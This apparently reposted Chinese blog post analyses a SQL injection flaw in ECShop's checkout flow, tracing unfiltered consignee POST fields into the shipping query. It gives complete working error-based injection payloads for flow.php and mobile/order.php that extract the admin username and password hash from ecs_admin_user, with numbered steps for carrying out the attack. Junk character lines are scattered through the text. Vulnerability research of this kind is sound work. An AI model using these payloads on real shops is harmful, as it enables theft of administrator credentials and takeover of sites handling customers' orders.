ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
1 ]+ ~5 E( _2 s
8 m7 }0 K) O, w2 s. M  a/ ]0 @7 f    漏洞关键文件：
2 |: |7 K. M$ L! Y6 V$ i
    /includes/lib_order.php

- b$ }( `5 d0 t7 H) d; c    关键函数：
) J5 L. u/ U$ w8 R+ E& F% h5 P
) a$ l  x) v) d: A& l- c' k

01     function available_shipping_list($region_id_list)
. s2 @4 K. h% D) Q! S; Z4 C8 M0 c4 ?
. S" f" i' W( ~' v6 z02 {

03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

+ i6 z/ N! j3 u8 f! F+ w" M04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
1 G) P5 U% e- o+ Q8 U
05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
6 {6 ^- e  p$ U2 S. b2 H9 `
06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

! v7 E- Z5 P' [08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

3 Y: q% b) Z8 B9 f/ r10   
& y7 Q+ i0 k2 m& j
2 ^/ l" l9 d+ X/ z; g11     return $GLOBALS['db']->getAll($sql);
9 b: [8 p$ f  c* Z" x
12 }

显然对传入的参数没有任何过滤就带入了查询语句。
& k, t/ I. w) A- S6 p
下面我们追踪这个函数在flow.php中：
第531行：   
5 s1 s" e5 F5 `- y+ e
1 $shipping_list     = available_shipping_list($region);
5 T7 A% A: w' d( f; n
' h/ W7 s& r# _4 Y: _( n& c

# m" K/ n* _7 K, r7 ^

再对传入变量进行追踪：
+ X* N; p( W' w! {
7 v3 r* H& E: f" Y) f+ S0 s7 b第530行：   
4 K# M" @0 ~6 H( r& x& B' r
1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);




5 Y( D* H9 b  L$ Y$ i% _
: ?0 U+ h. r# U1 e: d3 k第473行：        
. Z: j( \% H$ L9 E1 l
1 $consignee = get_consignee($_SESSION['user_id']);

5 v% B9 |& d# P* B5 |到了一个关键函数：

/includes/lib_order.php
. b5 A; s3 T( w) o: n3 O3 O3 x. v* n

6 I: F% d; R3 z+ @1 I0 c

7 o0 q& u3 o# @4 \- G! a* D- j
01 function get_consignee($user_id)

02 {

6 a% S  v/ g" e6 h: B2 Q03     if (isset($_SESSION['flow_consignee']))
& c% O3 q6 b# S3 l
. h, q" ^1 T% H' N4 P04     {

; u/ O4 a  ]. N1 B: }05         /* 如果存在session，则直接返回session中的收货人信息 */

06   
! a& G* R+ g6 b+ q: m
07         return $_SESSION['flow_consignee'];
: h% X. r, w; F3 G* L
. v& I6 F8 l, ]" K0 n- e* g08     }

09     else
5 g( E8 |7 r5 R- S6 V% r# ^
10     {

11         /* 如果不存在，则取得用户的默认收货人信息 */

/ F1 i3 ]3 [5 {1 O) m12         $arr = array();
- h7 }9 o: D- \# Z( l& h
- v3 h$ s3 I8 w+ M& N$ k13   
) u  f4 G8 }3 _! c! x5 l
14         if ($user_id > 0)

15         {
7 o0 v! }: b0 n/ ]
16             /* 取默认地址 */

17             $sql = "SELECT ua.*".

0 G% ~+ F. l7 n: m18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
2 `: h) r4 f" \! K/ ?
19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
8 `. r8 I4 s! C. l9 q
+ Z% P- O% o: q$ \  g& k20   

. A/ C* G" ~' X/ B' G  {" M- v, D21             $arr = $GLOBALS['db']->getRow($sql);

0 V0 @& I5 l$ R# {8 m6 h22         }

23   
, y7 U& A, C! X; H
! W7 S$ c3 z4 L; ~$ O. R24         return $arr;

# R% K3 M8 c2 O# r& g  k25     }
( S9 U& E9 A# m5 L9 }( g
. z9 C* ]  H- \26 }

: A# C- |6 b2 J- V2 f! E显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
& f  B( C3 V" a. n

$ J9 i( l: ~8 N" \0 s3 o+ d
: d7 F& H# v; |' c2 g. A5 i7 v$ ]1 ^关键点:
6 k5 b; ~6 }8 J/ |# {
第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
. q( Z1 C  j) A# @
这里对传入参数反转义存入$_SESSION中。

* A6 o; k6 t) D+ L$ U

然后看下：
9 N! J) g8 ]8 C
; `: G6 I2 t7 @8 q6 H6 k/ g

   

  H* n; c4 m" b( I01 $consignee = array(

02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
$ ^4 _5 N, s; K  o
03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

  B) [; N% e. h0 f04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
% K: `, X& n- h0 S
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

! `( i! V, [, C' _+ ]! y/ ^07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
! d3 ~5 {* U, I9 ?4 L! m1 h
08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
9 {% G+ Q6 P) i) i7 f  ~
10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
' X' e: [9 [' ]5 _1 Y4 ]5 d
12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),
! W% u/ X* ], |7 d
" c( h  M- d/ @; @/ q$ {5 Y13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

15     );

好了注入就这样出现了。
: V: B9 @$ U& I
( a% {; Y' a. d- u) i==================

注入测试：
7 B+ s; W# b/ |
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

( T; m5 I* x  n; o' U4 X测试程序：ECShop_V2.7.3_UTF8_release1106


7 k- V: I4 K/ _1 h$ ~
1.首先需要点击一个商品加入购物车
8 T1 |7 M9 j3 D, L, s8 i( v0 x& S
2.注册一个会员帐号
4 `, W5 w3 ~) l/ {8 p, t# M) P
3.post提交数据

6 e$ h* G3 ~! H, L8 b1 z/ f

1 http://127.0.0.1/ecshop/flow.php
3 B3 a& D, J! [: W/ Y) S
2   

4 f: t0 `$ c: l. D' h3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：
! q1 m3 B' Q7 g2 H4 ]" j) r
! b9 ]: l& m% e, L我们搜寻关键函数function available_shipping_list()
2 C: A  V/ X8 t. q: L6 o
7 C9 q7 n2 P2 f1 Q+ V9 s在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

* E: z5 K* a$ k3 h' _& O利用exp:
( e. |2 r7 \2 _0 J, E/ c0 y( k2 s
- w( K9 Q* X& F# v6 C1.点击一个商品，点击购买商标
) K. K- c8 s( |, Z, Z- ^( j% @/ ]
2.登录会员帐号
! p2 D: K% T( ?, h8 D! L. L* Z* D
: {. s+ s5 R. ^) L6 C3.post提交：
! v; i/ h5 j, v+ D8 F
http://127.0.0.1/ecshop/mobile/order.php

, U4 ]  |5 ~) y" G) w$ u
& S/ C: H  k' Q4 N: L+ k
1 ?$ t3 c, K6 ?1 U0 _+ Bcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=